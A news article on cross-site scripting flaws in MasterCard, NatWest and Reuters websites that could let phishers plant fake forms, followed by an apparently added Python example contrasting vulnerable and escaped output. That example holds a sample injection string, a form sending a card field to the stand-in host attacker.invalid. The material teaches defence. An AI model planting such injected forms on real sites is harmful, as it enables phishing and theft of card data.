Leading financial institutions have adopted a more aggressive attitude toward online identity theft cons known as "phishing scams" in recent months. But companies, including MasterCard International, may be unwittingly helping phishers trick online shoppers, says a new report from a UK web developer.
A test of leading financial services websites, including sites run by MasterCard, NatWest and Reuters Group, revealed that many sites have loosely protected features that scam artists can use to mask their own malicious websites, hijacking the name and web address of established institutions, says Sam Greenhalgh, who is 19 and operates the website Zapthedingbat.com.
The security lapses at major financial sites Greenhalgh has identified are not caused by flawed Microsoft products. Indeed, the trick works with most popular web browsers. Instead, poorly designed and insecure features on leading websites that contain "cross-site scripting" vulnerabilities are to blame, he says.
Greenhalgh uses the example of an "ATM Locator" feature on MasterCard's website. The ATM Locator was designed to help MasterCard holders locate cash machines that accept MasterCard. Users input a location, including a country and street address, and the website provides the location of cash machines in the area.
However, because of a cross-site scripting vulnerability in the feature, Greenhalgh was able to inject his own HTML into the fields used by the ATM Locator, causing the mastercard.com site to display his content, including a mock form that could be used to harvest information.
With the web browser address bar reading "http://www.mastercard.com" and the MasterCard logo adorning the page, even sophisticated web surfers would be hard put to prove that they were not interacting with the credit card company instead of scam artists, Greenhalgh says.
"The danger for Joe Public is in increasing his susceptibility," Greenhalgh says. "Phishing attacks have been around a long time and usually they're very easy to spot – you can look in the address bar and see you're not at mastercard.com. But these flaws allow phishers to actually use the legitimate site. As a user, it's very hard to tell," he says.
The cross-site scripting vulnerability is an old exploit that has been around for a long time, but hasn't yet been exploited by scam artists, says Dave Kurzynski, chief technology officer of Internet brand protection firm NameProtect.
Still, the vulnerability could become more common as "low hanging fruit" and easier avenues to trick consumers are closed to scammers, he says.
Greenhalgh's website notes similar flaws in seven other sites, including attacks on search features at reuters.com, Internet payment service WorldPay and NatWest. NatWest did not immediately respond to a request for comment. MasterCard declined to comment for this article.
Shoddy coding by Web developers is mostly responsible, but the companies are also to blame, Greenhalgh says.
"I think it's a matter of the attitude that both developers and their employers have to their product and the quality of service that they are giving to customers. Quality of service is not just a factor of what the customer perceives. It's a whole package."
Companies across industries should be examining their websites and web-based applications carefully with cross-site scripting vulnerabilities in mind, Kurzynski says.
"Any website that accepts text input and displays it is possibly vulnerable. Any newly written application should be designed with this in mind and legacy applications in use since this exploit was discovered need to be changed to protect against it," he says.
Web search features are a common source of cross-site scripting flaws, especially those that echo back the requested search word or phrase to users, Greenhalgh says.
"In effect what I am doing is using something that is designed to trust user input too much," he says.
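The flaw the article describes (a search or locator feature that echoes the user's input straight back into the page) is reflected cross-site scripting. The following is an added example, not code from the article or from any of the sites it names: a minimal page renderer written two ways, one that echoes the term raw and one that escapes it for the HTML context it lands in, plus a parser-based check a developer can run against either version. The page template, the "ATM Locator" heading, the `attacker.invalid` form target and the probe tag are all constructed for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs. INJECTED_QUERY is the kind of planted HTML the
# article describes (a mock form dropped into an echoed search term); it is
# only ever handled as a string here. BENIGN_QUERY shows that unescaped echo
# also mangles perfectly ordinary input.
INJECTED_QUERY = (
    '<form action="http://attacker.invalid/collect">'
    '<input name="card"></form>'
)
BENIGN_QUERY = "cash machines near Tom & Jerry's, 5th <Avenue>"

# Hypothetical results page: a heading, the echoed term, and the site's own
# search form. The {query} slot is where the reflection happens.
PAGE_TEMPLATE = (
    "<html><body>"
    "<h1>ATM Locator</h1>"
    "<p>Results for: {query}</p>"
    "<form action='/locate'><input name='q'></form>"
    "</body></html>"
)


def render_vulnerable(query: str) -> str:
    """Echoes the raw term into the page body: a reflected XSS sink."""
    return PAGE_TEMPLATE.format(query=query)


def render_hardened(query: str) -> str:
    """Escapes <, >, & and both quote characters before the term is echoed.

    html.escape(quote=True) is the right encoding for HTML text and for
    quoted attribute values; other sinks (JavaScript, URLs, CSS) need their
    own context-specific encoding, not this one.
    """
    return PAGE_TEMPLATE.format(query=html.escape(query, quote=True))


class TagCounter(HTMLParser):
    """Counts start tags, so injected elements show up as extra tags."""

    def __init__(self) -> None:
        super().__init__()
        self.counts: dict[str, int] = {}

    def handle_starttag(self, tag, attrs) -> None:
        self.counts[tag] = self.counts.get(tag, 0) + 1


def count_tags(page: str) -> dict[str, int]:
    """Parse a rendered page and return {tag_name: occurrences}."""
    parser = TagCounter()
    parser.feed(page)
    parser.close()
    return parser.counts


def reflects_raw_html(render) -> bool:
    """Developer self-check: does the renderer echo markup unescaped?

    Uses a constructed probe tag name that no real page would emit, so a
    verbatim match means the input reached the page without encoding.
    """
    probe = "<xss-probe-tag>"
    return probe in render(probe)


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("hardened", render_hardened)):
        tags = count_tags(render(INJECTED_QUERY))
        print(f"{name}: form tags={tags.get('form', 0)}, "
              f"reflects raw HTML={reflects_raw_html(render)}")
```

The vulnerable renderer yields two `form` elements for the injected term (the site's own plus the planted one) while the hardened one yields only the site's own, and the probe check distinguishes the two without any browser. Output encoding at the sink is the fix Kurzynski's advice points to for both new and legacy applications; a Content-Security-Policy header is a useful second layer but does not replace it.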